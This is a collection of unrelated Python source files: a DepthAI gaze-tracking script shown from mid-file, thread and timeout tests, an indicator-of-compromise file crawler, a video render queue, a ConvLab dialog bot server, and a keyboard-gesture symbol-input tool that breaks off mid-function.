gaze_nn = self.device.getOutputQueue("gaze_nn")
while self.running:
try:
self.gaze = np.array(gaze_nn.get().getFirstLayerFp16())
except RuntimeError as ex:
continue
def should_run(self):
if self.running:
return True if camera else self.cap.isOpened()
else:
return False
def get_frame(self, retries=0):
if camera:
return True, np.array(self.cam_out.get().getData()).reshape((3, 300, 300)).transpose(1, 2, 0).astype(np.uint8)
else:
read_correctly, new_frame = self.cap.read()
if not read_correctly or new_frame is None:
if retries < 5:
return self.get_frame(retries+1)
else:
print("Source closed, terminating...")
return False, None
else:
return read_correctly, new_frame
def run(self):
self.threads = [
threading.Thread(target=self.face_thread),
threading.Thread(target=self.land_pose_thread),
threading.Thread(target=self.gaze_thread)
]
for thread in self.threads:
thread.start()
while self.should_run():
try:
read_correctly, new_frame = self.get_frame()
except RuntimeError:
continue
if not read_correctly:
break
self.fps.update()
self.frame = new_frame
self.debug_frame = self.frame.copy()
if not camera:
nn_data = depthai.NNData()
nn_data.setLayer("data", to_planar(self.frame, (300, 300)))
self.face_in.send(nn_data)
if debug: # face
if self.gaze is not None and self.left_bbox is not None and self.right_bbox is not None:
re_x = (self.right_bbox[0] + self.right_bbox[2]) // 2
re_y = (self.right_bbox[1] + self.right_bbox[3]) // 2
le_x = (self.left_bbox[0] + self.left_bbox[2]) // 2
le_y = (self.left_bbox[1] + self.left_bbox[3]) // 2
x, y = (self.gaze * 100).astype(int)[:2]
if args.lazer:
beam_img = np.zeros(self.debug_frame.shape, np.uint8)
for t in range(10)[::-2]:
cv2.line(beam_img, (re_x, re_y), ((re_x + x*100), (re_y - y*100)), (0, 0, 255-t*10), t*2)
cv2.line(beam_img, (le_x, le_y), ((le_x + x*100), (le_y - y*100)), (0, 0, 255-t*10), t*2)
self.debug_frame |= beam_img
else:
cv2.arrowedLine(self.debug_frame, (le_x, le_y), (le_x + x, le_y - y), (255, 0, 255), 3)
cv2.arrowedLine(self.debug_frame, (re_x, re_y), (re_x + x, re_y - y), (255, 0, 255), 3)
if not args.lazer:
for raw_bbox in self.bboxes:
bbox = frame_norm(self.frame, raw_bbox)
cv2.rectangle(self.debug_frame, (bbox[0], bbox[1]), (bbox[2], bbox[3]), (10, 245, 10), 2)
if self.nose is not None:
cv2.circle(self.debug_frame, (self.nose[0], self.nose[1]), 2, (0, 255, 0), thickness=5, lineType=8, shift=0)
if self.left_bbox is not None:
cv2.rectangle(self.debug_frame, (self.left_bbox[0], self.left_bbox[1]), (self.left_bbox[2], self.left_bbox[3]), (245, 10, 10), 2)
if self.right_bbox is not None:
cv2.rectangle(self.debug_frame, (self.right_bbox[0], self.right_bbox[1]), (self.right_bbox[2], self.right_bbox[3]), (245, 10, 10), 2)
if self.pose is not None and self.nose is not None:
draw_3d_axis(self.debug_frame, self.pose, self.nose)
if camera:
cv2.imshow("Camera view", self.debug_frame)
else:
aspect_ratio = self.frame.shape[1] / self.frame.shape[0]
cv2.imshow("Video view", cv2.resize(self.debug_frame, (int(900), int(900 / aspect_ratio))))
if cv2.waitKey(1) == ord('q'):
cv2.destroyAllWindows()
break
self.fps.stop()
print("FPS: {:.2f}".format(self.fps.fps()))
if not camera:
self.cap.release()
cv2.destroyAllWindows()
for i in range(1, 5): # https://stackoverflow.com/a/25794701/5494277
cv2.waitKey(1)
self.running = False
with depthai.Device(create_pipeline()) as device:
app = Main(device)
# Register a graceful CTRL+C shutdown
def signal_handler(sig, frame):
app.running = False
signal.signal(signal.SIGINT, signal_handler)
app.run()
for thread in app.threads:
thread.join()
|
threads.py
|
import errno
import sys
from difflib import unified_diff
from threading import Thread
sys.path.append("../../common")
from env_indigo import *
ext = "svg"
thread_count = 100
a = {}
if not os.path.exists(joinPathPy("out/threads", __file__)):
try:
os.makedirs(joinPathPy("out/threads", __file__))
except OSError as e:
if e.errno != errno.EEXIST:
raise
def threadFunction(i):
indigo = Indigo()
renderer = IndigoRenderer(indigo)
mol = indigo.loadMolecule("C")
indigo.setOption("render-output-format", ext)
renderer.renderToFile(
mol, joinPathPy("out/threads/thread_%s.%s" % (i, ext), __file__)
)
with open(
joinPathPy("out/threads/thread_%s.%s" % (i, ext), __file__), "r"
) as f:
a[i] = f.read()
if isIronPython():
renderer.Dispose()
indigo.Dispose()
def runThreads():
threads_list = []
for i in range(thread_count):
t = Thread(target=threadFunction, args=(i,))
t.start()
threads_list.append(t)
for t in threads_list:
t.join()
for i in range(1, thread_count):
if a[i] != a[i - 1]:
# check number of lines because SVG have different id in different iterations with the same meaning:
# -<g id="surface45">
# +<g id="surface13">
if len(a[i].split("\n")) != len(a[i - 1].split("\n")):
result = unified_diff(a[i].splitlines(), a[i - 1].splitlines())
print("\n".join(result))
runThreads()
|
test_exec_timeout.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2022 Valory AG
# Copyright 2018-2021 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests for the helpers.exec_timout."""
import os
import time
import unittest
from functools import partial
from threading import Thread
from unittest.case import TestCase
import pytest
from aea.helpers.exec_timeout import (
BaseExecTimeout,
ExecTimeoutSigAlarm,
ExecTimeoutThreadGuard,
TimeoutException,
)
from tests.common.utils import timeit_context
from tests.conftest import MAX_FLAKY_RERUNS
if os.name == "nt":
pytest.skip("signal.settimer non available on Windows.", allow_module_level=True)
class BaseTestExecTimeout(TestCase):
"""Base test case for code execution timeout."""
EXEC_TIMEOUT_CLASS = BaseExecTimeout
@classmethod
def setUpClass(cls):
"""Set up."""
if cls is BaseTestExecTimeout:
raise unittest.SkipTest("Skip BaseTest tests, it's a base class")
def test_cancel_by_timeout(self):
"""Test function interrupted by timeout."""
slow_function_time = 0.4
timeout = 0.1
assert timeout < slow_function_time
with timeit_context() as timeit_result:
with pytest.raises(TimeoutException):
with self.EXEC_TIMEOUT_CLASS(timeout) as exec_timeout:
self.slow_function(slow_function_time)
assert exec_timeout.is_cancelled_by_timeout()
assert (
timeit_result.time_passed >= timeout
and timeit_result.time_passed < slow_function_time
)
def test_limit_is_0_do_not_limit_execution(self):
"""Test function will not be interrupted cause timeout is 0 or None."""
slow_function_time = 0.1
timeout = 0
assert timeout < slow_function_time
with timeit_context() as timeit_result:
with self.EXEC_TIMEOUT_CLASS(timeout) as exec_timeout:
self.slow_function(slow_function_time)
assert not exec_timeout.is_cancelled_by_timeout()
assert timeit_result.time_passed >= slow_function_time
def test_timeout_bigger_than_execution_time(self):
"""Test function interrupted by timeout."""
slow_function_time = 0.1
timeout = 1
assert timeout > slow_function_time
with timeit_context() as timeit_result:
with self.EXEC_TIMEOUT_CLASS(timeout) as exec_timeout:
self.slow_function(slow_function_time)
assert not exec_timeout.is_cancelled_by_timeout()
assert (
timeit_result.time_passed <= timeout
and timeit_result.time_passed >= slow_function_time
)
@classmethod
def slow_function(cls, sleep):
"""Sleep some time to test timeout applied."""
time.sleep(sleep)
class TestSigAlarm(BaseTestExecTimeout):
"""Test code execution timeout using unix signals."""
EXEC_TIMEOUT_CLASS = ExecTimeoutSigAlarm
class TestThreadGuard(BaseTestExecTimeout):
"""Test code execution timeout using. thread set execption."""
EXEC_TIMEOUT_CLASS = ExecTimeoutThreadGuard
def setUp(self):
"""Set up."""
self.EXEC_TIMEOUT_CLASS.start()
def tearDown(self):
"""Tear down."""
self.EXEC_TIMEOUT_CLASS.stop(force=True)
@classmethod
def slow_function(cls, sleep):
"""Sleep in cycle to be perfect interrupted."""
fractions = 10
for _ in range(fractions):
time.sleep(sleep / fractions)
@pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS)
def test_execution_limit_in_threads(self):
"""Test two threads with different timeouts same time."""
# pydocstyle: ignore # conflict with black # noqa: E800
def make_test_function(slow_function_time, timeout):
assert timeout < slow_function_time
with timeit_context() as timeit_result:
with pytest.raises(TimeoutException):
with self.EXEC_TIMEOUT_CLASS(timeout) as exec_limit:
self.slow_function(slow_function_time)
assert exec_limit.is_cancelled_by_timeout()
assert (
timeit_result.time_passed >= timeout
and timeit_result.time_passed < slow_function_time
)
t1_sleep, t1_timeout = 1, 0.6
t2_sleep, t2_timeout = 0.45, 0.1
t1 = Thread(target=partial(make_test_function, t1_sleep, t1_timeout))
t2 = Thread(target=partial(make_test_function, t2_sleep, t2_timeout))
with timeit_context() as time_t1:
t1.start()
with timeit_context() as time_t2:
t2.start()
t2.join()
t1.join()
assert t2_timeout <= time_t2.time_passed <= t2_sleep
assert t1_timeout <= time_t1.time_passed < t1_sleep
def test_supervisor_not_started():
"""Test that TestThreadGuard supervisor thread not started."""
timeout = 0.1
sleep_time = 0.5
exec_limiter = ExecTimeoutThreadGuard(timeout)
with exec_limiter as exec_limit:
assert not exec_limiter._future_guard_task
TestThreadGuard.slow_function(sleep_time)
assert not exec_limit.is_cancelled_by_timeout()
|
crawler.py
|
#!/usr/bin/python3
## --------------------------------------------------------------------------------------------------------------------
import logging # for log
import os # for file handling, exit
import sys # for exit
import multiprocessing # for multiprocessing purpose
import re # for pattern
from configparser import ConfigParser, ExtendedInterpolation # for loading config files
from .crawlererr import CrawlerConfigError, CrawlerError, CrawlerFileReadError, CrawlerProcessError, CrawlerMatchError # ioc crawler error handling
from .crawlerdata import CrawlerVo, CrawlerWhitelistData # data objects
## --------------------------------------------------------------------------------------------------------------------
LOG = logging.getLogger('IocCrawlerLog')
## --------------------------------------------------------------------------------------------------------------------
## Class for ioc crawling
class Crawler():
## constructor
# Init variables and read all files
def __init__(self, pathSrc:str, threadsSrc:int, patternSrc:str, printToStdoutSrc:bool,
resultColumnFormatSrc:list, sectionsSrc:list, matchHighlightingSrc:bool,
matchSizeSrc:int, whitelistSrc:str=None, beforeSrc:int=0, afterSrc:int=0) -> None:
try:
# init
self.blockQueue = multiprocessing.Queue()
self.sharedQueue = multiprocessing.Queue()
self.processCount = threadsSrc
self.processedFileCount = multiprocessing.Value('i', 0)
self.whiteListedMatches = multiprocessing.Value('i', 0)
self.overMaxMatchSize = multiprocessing.Value('i', 0)
self.rootFilePath = ""
self.rootRelPath = ""
self.printToStdOut = printToStdoutSrc
self.resultList = []
self.whitlist = None
self.whitlistedFiles = 0
self.result_columns = resultColumnFormatSrc
self.sectionsForResult = sectionsSrc
self.matchHighligting = matchHighlightingSrc
self.before = beforeSrc
self.after = afterSrc
self.matchSize = matchSizeSrc
self._printCrawlerMessage('[+] Init Crawler')
LOG.debug("Init Crawler")
# check path of source dir
if not os.path.exists(pathSrc):
raise CrawlerFileReadError("File not found.", os.path.basename(pathSrc))
if not os.path.isabs(pathSrc):
self.rootFilePath = os.path.abspath(pathSrc)
else:
self.rootFilePath = pathSrc
# set relative path
if self.rootFilePath != pathSrc:
self.rootRelPath = os.path.relpath(pathSrc)
else:
self.rootRelPath = pathSrc
# Check match size
if self.matchSize < 5:
raise CrawlerConfigError("Match size have to be greater then 5")
# load pattern
self.patterns = self._loadPattern(patternSrc)
LOG.debug('Pattern loaded: ' + str(len(self.patterns)))
# load whitelist
if whitelistSrc:
self.whitlist = self._loadWhitelist(whitelistSrc)
LOG.debug('Whitelist loaded')
else:
LOG.debug('No whitelist')
# check files
self._printCrawlerMessage('[+] Checking files')
self.fileList = self._readFiles(self.rootFilePath, self.rootRelPath)
self.fileListSize = len(self.fileList)
self._printCrawlerMessage(" |- %d files found, %d whitelisted." %(self.fileListSize, self.whitlistedFiles))
LOG.debug("%d files found for processing" %(self.fileListSize))
except CrawlerFileReadError as re:
raise re
except CrawlerConfigError as ce:
raise ce
except Exception as e:
raise CrawlerError("Initialisation error. " + getattr(e, 'message', repr(e)))
# end init
## Loads pattern from config or personal file
# - patterns will only loaded if they are selected from user
# @param patternFileSrc - all search pattern
# @return - a patterns dict
def _loadPattern(self, patternFileSrc) -> list:
try:
LOG.debug('Load patterns')
patternCfg = ConfigParser(interpolation=None)
patternCfg.read(patternFileSrc)
patterns = {}
for ioc_type in patternCfg.sections():
if ioc_type.lower() in self.sectionsForResult:
for option in patternCfg.options(ioc_type):
ioc_pattern = patternCfg[ioc_type][option]
if ioc_pattern:
if ioc_type not in patterns:
patterns[ioc_type] = [re.compile(b'%b' % bytearray(ioc_pattern.encode('utf-8')))]
else:
patterns[ioc_type].append(re.compile(b'%b' % bytearray(ioc_pattern.encode('utf-8'))))
# end if
# end if
# end for
# end for
return patterns
except Exception as e:
raise CrawlerConfigError(getattr(e, 'message', repr(e)))
# end _loadPattern
## Loads whitelist from config or personal file
# @param whitelistFileSrc
# @return - a patterns dict
def _loadWhitelist(self, whitelistFileSrc) -> CrawlerWhitelistData:
try:
LOG.debug('Load whitelist')
whitelistCfg = ConfigParser(interpolation=ExtendedInterpolation())
whitelistCfg.read(whitelistFileSrc)
whitelistObj = CrawlerWhitelistData()
for wh_section in whitelistCfg.sections():
for option in whitelistCfg.options(wh_section):
whitelistObj.addWhiteListItem(wh_section, option, whitelistCfg[wh_section][option].strip().split('\n'))
# end for
# end for
return whitelistObj
except Exception as e:
raise CrawlerConfigError(getattr(e, 'message', repr(e)))
# end _loadWhitelist
## Reads all files from the directory
# If the file/directory is whitelisted, it will not added to the file list
# @param dirSrc root source
# @return file list to read
def _readFiles(self, rootFilePathSrc, relPathSrc) -> list:
try:
filesList = []
filename = ""
if os.path.isfile(rootFilePathSrc):
filesList.append(rootFilePathSrc)
else:
for root, dirs, files in os.walk(rootFilePathSrc):
for filename in files:
filePathStr = os.path.join(root, filename)
if self.whitlist:
# get the index of the relative beginning of the file to check whitelisting
idx = filePathStr.index(relPathSrc) + len(relPathSrc)
if filePathStr[idx:] in self.whitlist:
LOG.debug("%s whitelisted." %(filePathStr[idx:]))
self.whitlistedFiles +=1
else:
filesList.append(filePathStr)
else:
filesList.append(filePathStr)
# end for
# end for
# end rootFilePath is directory
except IOError as io:
raise CrawlerFileReadError(getattr(io, 'message', repr(io)), filename)
except Exception as e:
raise CrawlerError(getattr(e, 'message', repr(e)))
return filesList
# end _readFiles
### Returns a summary to all found ioc types and the count of matches
# - checks the white listed file count
# - checks the white listed matches count
# @return List of strings
def getResultSummary(self) -> dict:
summaryDict = {}
if self.whitlist:
if self.whitlistedFiles > 0:
summaryDict["Whitelisted files"] = self.whitlistedFiles
if self.whiteListedMatches.value > 0:
summaryDict["Whitelisted matches"] = self.whiteListedMatches.value
if self.overMaxMatchSize.value > 0:
summaryDict["Matchs above the max match size"] = self.whiteListedMatches.value
# end if self.whitlist
for item in self.resultList:
for key in item.mCount.keys():
if key not in summaryDict:
summaryDict[key] = item.mCount[key]
else:
summaryDict[key] = summaryDict[key] + item.mCount[key]
# end for
return summaryDict
# end def getResultSummary
## Process files from block
# - do pattern search
# - check for whitelist etc
# @param blockFiles - the files to process
def _processBlock(self, blockFiles, shared_list) -> None:
try:
for file in blockFiles:
try:
# create value object for the results - save only the relative path to the results
cvo = CrawlerVo(file[len(self.rootRelPath):])
with open(file, 'rb') as f:
LOG.debug("Processing %s" %(file))
fileSize = os.path.getsize(file)
bufSize = 32384 # read buffer
overlap = 1024 # overlap reading size
filePos = 0 # current position in file
# if file size is smaler then the buffer, do no overlap reading
if fileSize < bufSize:
bufSize = fileSize
overlap = 0
# read the file in blocks
while filePos < fileSize:
# log status
if filePos > 0:
if (filePos/10) % 100 == 0:
LOG.debug("Hanging on %s; read %d/%d bytes" %(file, filePos, fileSize))
buffer = None
buffer = f.read(bufSize+overlap)
for ioc_type in self.patterns:
for pattern in self.patterns[ioc_type]:
matchDict = {}
searchRes = re.finditer(pattern, buffer)
for item in searchRes:
if item.start() < bufSize:
try:
matchString = item.group(0).decode("utf-8")
# Check match size
if len(matchString) > self.matchSize:
raise CrawlerMatchError("Match for %s is greater then %d." %(item, self.matchSize))
before = ""
after = ""
if self.before > 0:
raise CrawlerError("self.before not implemented")
elif self.after > 0:
raise CrawlerError("self.after not implemented")
#after = buffer[item.start() + len(matchString): item.start() + len(matchString) + self.after].decode("utf-8")
#printDict = {"file" : file, "ioc" : ioc_type,
# "match": before + matchString + after, "offset": str(filePos + item.start())}
# hint: save only relative path
printDict = {"file" : file[len(self.rootRelPath):], "ioc" : ioc_type, "match": matchString, "offset": str(filePos + item.start())}
isWhiteListed = False
if self.whitlist:
if matchString in self.whitlist:
isWhiteListed = True
with self.processedFileCount.get_lock():
self.whiteListedMatches.value +=1
if not isWhiteListed:
if self.printToStdOut:
self._printCrawlerResult(printDict)
if matchString not in matchDict:
matchDict[before + matchString + after] = [str(filePos + item.start())]
else:
matchDict[before + matchString + after].extend([str(filePos + item.start())])
# end try
except UnicodeDecodeError as ude:
LOG.debug("Decoding error while Processing %s" %(item))
except CrawlerMatchError as me:
with self.processedFileCount.get_lock():
self.overMaxMatchSize.value +=1
LOG.debug(me)
# end if item.start() < pos + bufSize
# end for item in searchRes
# add match
if matchDict:
cvo.addMatchResults(ioc_type, matchDict)
# end for pattern
# end for ioc_type
# set new offset
if f.tell() < fileSize:
filePos = f.seek(f.tell() - overlap)
else:
filePos = f.tell()
# end while filePos < fileSize:
# end with file
# add crawler file value object to the result list
shared_list.append(cvo)
except IOError as ioe:
LOG.info("[!] " + getattr(ioe, 'message', repr(ioe)))
# end for
# set lock for the process counter and save the new status
with self.processedFileCount.get_lock():
self.processedFileCount.value += len(blockFiles)
# log processing status for the user
self._printCrawlerMessage(" |- Processed files: %d / %d [%s %%]" % (self.processedFileCount.value,
self.fileListSize,
self._getProcessStatus()))
except Exception as e:
raise CrawlerProcessError(getattr(e, 'message', repr(e)))
# end processBlock
## Main function for processing
# - inhires the nested function "procesQueue" for getting tasks from queue
def do(self) -> None:
self._printCrawlerMessage("[+] Start processing files")
manager = multiprocessing.Manager()
shared_list = manager.list()
processList = []
## Get Blocks from Queue and process them until queue is empty
def _processQueue():
while not self.blockQueue.empty():
# process block
LOG.debug("Get new block from queue")
blockFiles = self.blockQueue.get()
self._processBlock(blockFiles, shared_list)
# end processBlock
try:
# check if there is anything to do
if self.fileListSize < 1:
raise CrawlerFileReadError("No files to read.")
# Calc block size
blockSize = 0
if self.fileListSize < 10:
blockSize = self.fileListSize
self.processCount = 1
elif self.fileListSize < 100:
blockSize = round(self.fileListSize / 4)
elif self.fileListSize < 1000:
blockSize = round(self.fileListSize / 8)
elif self.fileListSize < 10000:
blockSize = round(self.fileListSize / 10)
fileCounter = 0
blockList = []
for item in self.fileList:
blockList.append(item)
fileCounter += 1
if fileCounter >= blockSize:
self.blockQueue.put(blockList)
del blockList
blockList = []
fileCounter = 0
# end if
# add the remaining files to the queue
if blockList:
self.blockQueue.put(blockList)
# create sub processes and start them
LOG.debug("Using %d processes for processing." %(self.processCount))
for process in range(1,self.processCount+1):
LOG.debug("Create Process")
process = multiprocessing.Process(target=_processQueue)
process.daemon = True
process.start()
processList.append(process)
# end for
for process in processList:
process.join()
# do post processing
self.resultList.extend(shared_list)
self._printCrawlerMessage("[+] Finished processing.")
except Exception as e:
raise CrawlerError("Error in do function. " + getattr(e, 'message', repr(e)))
except KeyboardInterrupt:
print("[!] User interrupt.")
try:
for process in processList:
process.terminate()
sys.exit(0)
except SystemExit:
os._exit(0)
# end do
## Calculates and returns the processing status
# @return string
def _getProcessStatus(self) -> str:
return str(round(self.processedFileCount.value / self.fileListSize * 100, 2))
## Print function for crawler program messages
# - message will be printed if stdout is disabled
def _printCrawlerMessage(self, msg:str) -> None:
if not self.printToStdOut:
if msg:
print(msg)
# end def _printCrawlerMessage
## Print function for crawler results
# - message will be printed if stdout is enabled
def _printCrawlerResult(self, printDictSrc:dict) -> None:
if self.printToStdOut:
printStr = ""
for item in self.result_columns:
# colored output for match
if item == "match" and self.matchHighligting:
printStr += "\x1b[0;30;41m" + printDictSrc[item] + "\x1b[0m "
else:
printStr += printDictSrc[item] + " "
print(printStr[:-1])
# end _printCrawlerResult
# end class crawler
|
render.py
|
# Copyright (c) 2021-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
import atexit
import io
import logging
import tempfile
from base64 import b64encode
from typing import List, Optional
import imageio
import matplotlib
import matplotlib.patheffects as pe
import numpy as np
import torch as th
import torch.multiprocessing as mp
from matplotlib import pyplot as plt
from visdom import Visdom
log = logging.getLogger(__name__)
class RenderQueue:
'''
An asynchronous queue for plotting videos to visdom.
'''
def __init__(self, viz: Optional[Visdom] = None):
self.viz = viz
self.queue = mp.Queue()
self.p = mp.Process(target=self.run, args=(self.queue, viz))
self.p.start()
self._call_close = lambda: self.close()
atexit.register(self._call_close)
def close(self):
self.queue.put({'msg': 'quit'})
self.p.join()
atexit.unregister(self._call_close)
def push(
self,
img: th.Tensor,
s_left: List[str] = None,
s_right: List[str] = None,
) -> None:
self.queue.put(
{'msg': 'push', 'img': img, 's_left': s_left, 's_right': s_right}
)
def plot(self) -> None:
if self.viz is None:
raise RuntimeError('No visom instance configured')
self.queue.put({'msg': 'plot'})
def save(self, path: str) -> None:
self.queue.put({'msg': 'save', 'path': path})
@staticmethod
def run(queue: mp.Queue, viz: Optional[Visdom] = None):
matplotlib.use('svg')
imgs = []
log.debug('Render queue running')
while True:
item = queue.get()
msg = item['msg']
if msg == 'quit':
break
elif msg == 'push':
imgs.append(item['img'])
if item['s_left'] or item['s_right']:
draw_text(
imgs[-1], s_left=item['s_left'], s_right=item['s_right']
)
elif msg == 'plot' and viz:
log.debug(f'Plotting video with {len(imgs)} frames to visdom')
try:
plot_visdom_video(viz, imgs)
except:
log.exception('Error plotting video')
imgs.clear()
elif msg == 'save':
log.debug(
f'Saving video with {len(imgs)} frames as {item["path"]}'
)
try:
video_data = video_encode(imgs)
with open(item['path'], 'wb') as f:
f.write(video_data)
except:
log.exception('Error saving video')
imgs.clear()
def video_encode(imgs: List[th.Tensor], fps: int = 24):
'''
Encode a list of RGB images (HxWx3 tensors) to H264 video, return as a
binary string.
'''
# TODO Can I write directly to a bytesIO object?
with tempfile.NamedTemporaryFile(suffix='.mp4') as tmp:
w = imageio.get_writer(
tmp.name, format='FFMPEG', mode='I', fps=fps, codec='h264'
)
for img in imgs:
w.append_data(img.numpy())
w.close()
data = open(tmp.name, 'rb').read()
return data
def draw_text(
img: th.Tensor, s_left: List[str] = None, s_right: List[str] = None
):
'''
Render text on top of an image (using matplotlib). Modifies the image
in-place.
img: The RGB image (HxWx3)
s_left: Lines of text, left-aligned, starting from top
s_right: Lines of text, right-aligned, starting from top
'''
dpi = 200
fig = plt.figure(frameon=False)
fig.set_size_inches(img.shape[1] / dpi, img.shape[0] / dpi)
fig.set_dpi(dpi)
ax = plt.Axes(fig, [0.0, 0.0, 1, 1])
ax.set_axis_off()
fig.add_axes(ax)
ax.imshow(img, interpolation='none')
fd = {'color': 'lime'}
fs = 8
if img.shape[0] < 400:
fs = 6
elif img.shape[0] < 250:
fs = 4
elif img.shape[0] < 150:
fs = 2
for i, s in enumerate(s_left if s_left is not None else []):
if isinstance(s, tuple):
s, c = s[0], s[1]
else:
c = fd
txt = fig.text(0, 1 - i * 0.05, s, c, fontsize=fs, va='top', ha='left')
txt.set_path_effects(
[pe.Stroke(linewidth=0.4, foreground='black'), pe.Normal()]
)
for i, s in enumerate(s_right if s_right is not None else []):
if isinstance(s, tuple):
s, c = s[0], s[1]
else:
c = fd
txt = fig.text(1, 1 - i * 0.05, s, c, fontsize=fs, va='top', ha='right')
txt.set_path_effects(
[pe.Stroke(linewidth=0.4, foreground='black'), pe.Normal()]
)
fig.canvas.draw()
buf = io.BytesIO()
fig.savefig(buf, format='rgba', dpi=dpi)
buf.seek(0)
data = np.frombuffer(buf.read(), dtype=np.uint8)
rgba_shape = (img.shape[0], img.shape[1], 4)
# Skip alpha channel when copying back to img
img.copy_(th.from_numpy(data.reshape(rgba_shape)[:, :, :3].copy()))
plt.close(fig)
def plot_visdom_video(
viz: Visdom, images: List[th.Tensor], show_progress=False, **kwargs
):
'''
Plot array of RGB images as a video in Visdom.
'''
video_data = video_encode(images)
encoded = b64encode(video_data).decode('utf-8')
html = f'<video controls><source type="video/mp4" src="data:video/mp4;base64,{encoded}">Your browser does not support the video tag.</video>'
viz.text(text=html)
|
bot_server.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import os
import sys
sys.path.append('../../')
from convlab.agent import Body
from convlab.agent import DialogAgent
from convlab.spec import spec_util
from convlab.env import make_env
import numpy as np
import copy
from flask import Flask, request, jsonify
from queue import PriorityQueue
from threading import Thread
rgi_queue = PriorityQueue(maxsize=0)
rgo_queue = PriorityQueue(maxsize=0)
app = Flask(__name__)
os.environ['lab_mode'] = 'eval'
spec_file = sys.argv[1]
spec_name = sys.argv[2]
lab_mode, prename = sys.argv[3].split('@')
spec = spec_util.get_eval_spec(spec_file, prename)
spec = spec_util.override_eval_spec(spec)
agent_spec = spec['agent'][0]
env = make_env(spec)
body = Body(env, spec['agent'])
agent = DialogAgent(spec, body)
last_obs = 'hi'
agent.reset(last_obs)
# obs = 'hi can you find me a hotel in the west?'
# action = agent.act(obs)
# next_obs = 'we have six people'
# agent.update(obs, action, 0, next_obs, 0)
# action = agent.act(next_obs)
@app.route('/', methods=['GET', 'POST'])
def process():
try:
in_request = request.json
print(in_request)
except:
return "invalid input: {}".format(in_request)
rgi_queue.put(in_request)
rgi_queue.join()
output = rgo_queue.get()
print(output['response'])
rgo_queue.task_done()
# return jsonify({'response': response})
return jsonify(output)
def generate_response(in_queue, out_queue):
while True:
# pop input
in_request = in_queue.get()
obs = in_request['input']
if in_request['agent_state'] == {}:
agent.reset(obs)
else:
encoded_state, dst_state = in_request['agent_state']
agent.body.encoded_state = np.asarray(encoded_state) if isinstance(encoded_state, list) else encoded_state
agent.dst.state = copy.deepcopy(dst_state)
try:
action = agent.act(obs)
agent.update(obs, action, 0, obs, 0)
encoded_state = agent.body.encoded_state.tolist() if isinstance(agent.body.encoded_state,
np.ndarray) else agent.body.encoded_state
dst_state = copy.deepcopy(agent.dst.state)
except Exception as e:
print('agent error', e)
try:
if action == '':
response = 'Sorry I donot understand, can you paraphrase?'
else:
response = action
except Exception as e:
print('Response generation error', e)
response = 'What did you say?'
out_queue.put({'response': response, 'agent_state': (encoded_state, dst_state)})
in_queue.task_done()
out_queue.join()
if __name__ == '__main__':
worker = Thread(target=generate_response, args=(rgi_queue, rgo_queue,))
worker.setDaemon(True)
worker.start()
app.run(host='0.0.0.0', port=10004)
|
main.py
|
# -*- coding: utf-8 -*-
import keyboard
import os
import threading
import time
from adjacent import is_adjacent, adjacent_rate
from tkinter import *
from queue import Queue
from predict import predict
from functools import partial
import numpy as np
global keyboard_stream
'''
[keyname, event, time]
'''
keyboard_stream = []
keyboard_record = []
keyboard_pressed = []
previous_space_time = 0
started = False # mark that a gesture is on
processed = False # mark it's in the process step
finished = False
previous_time = 0
symbol_count = 0 # count how many symbols have been glided
def convert_to_ms(time):
return int(time*1000) % 100000
def do_press(event):
# init press, start recording
#global started
global started
global previous_time
global finished
if not started:
# record anyway
keyboard_stream.append([event.name, 'press',event.time])
keyboard_pressed.append(event.name)
if event.name in ['space','backspace','enter']:
keyboard_stream.clear()
keyboard_pressed.clear()
else:
if previous_time == 0:
# mark the initial of the program
# then an key press event happen, store it in previous_time
previous_time = event.time
elif previous_time != 0 :
# mark that a previous key has been pressed
if event.time - previous_time > 0.3:
# print("previous",previous_time)
# print("now", event.time)
keyboard_stream.clear()
keyboard_pressed.clear()
# too long, clear before store
keyboard_stream.append([event.name, 'press',event.time])
keyboard_pressed.append(event.name)
previous_time = event.time
else:
previous_time = event.time
# for the judgement, add the time evaluation (only care about the press event)
if len(keyboard_pressed) >= 4 and adjacent_rate(keyboard_pressed) > 2/3:
#print("alert!",keyboard_pressed[-1],keyboard_pressed[-2])
print("alert!", keyboard_pressed)
started = True
stop_recording = threading.Timer(1.5, stop_and_process)
stop_recording.start()
else:
if not processed:
keyboard_record.append([event.name, 'press',event.time])
keyboard_pressed.append(event.name)
else:
if event.name in ['1','2','3','4','5','`'] and len(results) != 0:
if event.name == '`':
#pass
for i in range(len(keyboard_pressed)):
keyboard.press('backspace')
keyboard.press('backspace')
finished = True
time.sleep(0.2)
reset()
else:
for i in range(len(keyboard_pressed)):
keyboard.press('backspace')
keyboard.press('backspace')
keyboard.write(results[int(event.name) - 1])
finished = True
time.sleep(0.2)
reset()
#print(event.name, event.scan_code, event.time,"press")
def do_release(event):
if not started:
keyboard_stream.append([event.name, 'release', event.time])
elif started:
keyboard_record.append([event.name, 'press',event.time])
#print(event.name, event.scan_code, event.time,"release")
#keyboard.write("α")
def listen_keyboard():
#keyboard.add_hotkey('ctrl+q', quit)
#global_timer = time.time() # set initial timer
keyboard.on_press(do_press)
keyboard.on_release(do_release)
keyboard.wait('esc')
print(keyboard_stream)
print()
print(keyboard_pressed)
print()
print(keyboard_record)
#print(raw)
def stop_and_process():
print("stop")
GUI = threading.Thread(target=start_GUI)
GUI.start()
def reset():
keyboard_stream.clear()
keyboard_pressed.clear()
keyboard_record.clear()
global started
global processed
global finished
started = False
processed = False
finished = False
def start_GUI():
# entering the processing phrase
window = Tk()
# 进入消息循环
global results
window.title('gpk') #窗口标题
#window.geometry('450x60') #窗口尺寸
center_window(window,450,60)
print("showing window")
#results = ["α","β","Ω","π","μ"]
results = predict(keyboard_pressed)
options = "1." + results[0] + " 2." + results[1] + " 3." + results[2] + " 4." + results[3] + " 5." + results[4]
options = Label(window, text = options, width = 30, height = 2,anchor=NW,font=("Consolas",30))
options.pack()
